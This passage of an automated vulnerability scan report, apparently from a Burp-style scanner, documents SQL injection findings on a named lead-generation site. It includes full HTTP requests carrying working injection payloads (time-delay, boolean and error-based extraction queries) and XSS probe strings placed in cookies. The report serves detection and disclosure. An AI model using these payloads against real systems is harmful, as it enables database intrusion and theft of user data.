Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:21:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

1.25. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_429 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_429 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_429 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan'&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 24,999&attributeId_431=2801__A business that I am about to start&attribute' at line 5

1.26. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_429 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_429 parameter appears to be vulnerable to SQL injection attacks. The payloads 40938254'%20or%201%3d1--%20 and 40938254'%20or%201%3d2--%20 were each submitted in the attributeId_429 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan40938254'%20or%201%3d1--%20&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7ct781bmi5l4nb9astk5g3hgb7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan40938254'%20or%201%3d2--%20&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pgjj74jo63ga7pm3l8fb403b62; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Business Loans, Use InsideUp to Get Quotes and Compare Business Loan Providers </title>
   <meta name="description" content="Let business loan providers compete for your loan needs. Compare local and national business loan companies."/>
   <meta name="keywords" content=" Business Loans "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 15    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11, #step_12, #step_13, #step_14, #step_15, #step_16,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" vali
...[SNIP]...

1.27. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_429 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_429 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_429 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan'&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
